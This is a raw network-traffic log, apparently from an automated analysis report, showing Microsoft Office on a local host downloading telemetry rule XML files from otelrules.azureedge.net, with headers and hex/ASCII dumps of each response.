                                                                                                                                                                                                                                              2024-11-02 06:16:09 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              79192.168.2.46379813.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:09 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:09 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:09 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 2592
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BB5B890DB"
                                                                                                                                                                                                                                              x-ms-request-id: bab6baff-801e-002a-7024-2c31dc000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061609Z-176bd8f9bc5wl4brhC1DFWmstw00000001kg0000000096k1
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:09 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              80192.168.2.46379913.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:09 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:10 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:10 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 3342
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582B927E47E9"
                                                                                                                                                                                                                                              x-ms-request-id: b9b09701-201e-0096-2908-2cace6000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061610Z-16ccfc498976vdjnhC1DFW5ann00000001n000000000hrz6
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:10 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              81192.168.2.46380013.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:10 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:10 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:10 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 2284
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BCD58BEEE"
                                                                                                                                                                                                                                              x-ms-request-id: 87c6e767-f01e-003c-4308-2c8cf0000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061610Z-16ccfc49897d4xzbhC1DFWg2yn00000001k0000000005e1m
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:10 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              82192.168.2.46380113.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:10 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:10 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:10 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1393
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BE3E55B6E"
                                                                                                                                                                                                                                              x-ms-request-id: 6c1a7137-101e-00a2-6008-2c9f2e000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061610Z-16ccfc49897vgjnwhC1DFWbx9800000001m0000000007qrk
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:10 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              83192.168.2.46380313.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:10 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:11 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:10 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1393
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BE39DFC9B"
                                                                                                                                                                                                                                              x-ms-request-id: 1afb2a81-701e-0032-032f-2ca540000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061610Z-176bd8f9bc5bc7vmhC1DFWbxbs000000021000000000avht
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:11 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              84192.168.2.46380413.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:10 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:11 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:10 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1356
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BDF66E42D"
                                                                                                                                                                                                                                              x-ms-request-id: 87c6e830-f01e-003c-7a08-2c8cf0000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061610Z-16ccfc49897ht4f6hC1DFWwe7g00000001d000000000n3p1
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:11 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              85192.168.2.46380213.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:10 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:11 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:10 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1356
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BDC681E17"
                                                                                                                                                                                                                                              x-ms-request-id: 464d7020-e01e-0020-3508-2cde90000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061610Z-16ccfc49897w6rdhhC1DFWb10w00000001hg00000000kt0w
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:11 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              86192.168.2.46380513.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:11 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:11 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:11 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1395
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BE017CAD3"
                                                                                                                                                                                                                                              x-ms-request-id: 97ac533f-101e-00a2-476c-2b9f2e000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061611Z-16ccfc49897xnlwfhC1DFWz50s00000001tg000000003x9v
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:11 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              87192.168.2.46380713.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:11 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:11 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:11 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1358
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BE6431446"
                                                                                                                                                                                                                                              x-ms-request-id: d562200d-c01e-00ad-5011-2ca2b9000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061611Z-176bd8f9bc55l2dfhC1DFWw03w00000001r0000000006w3h
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
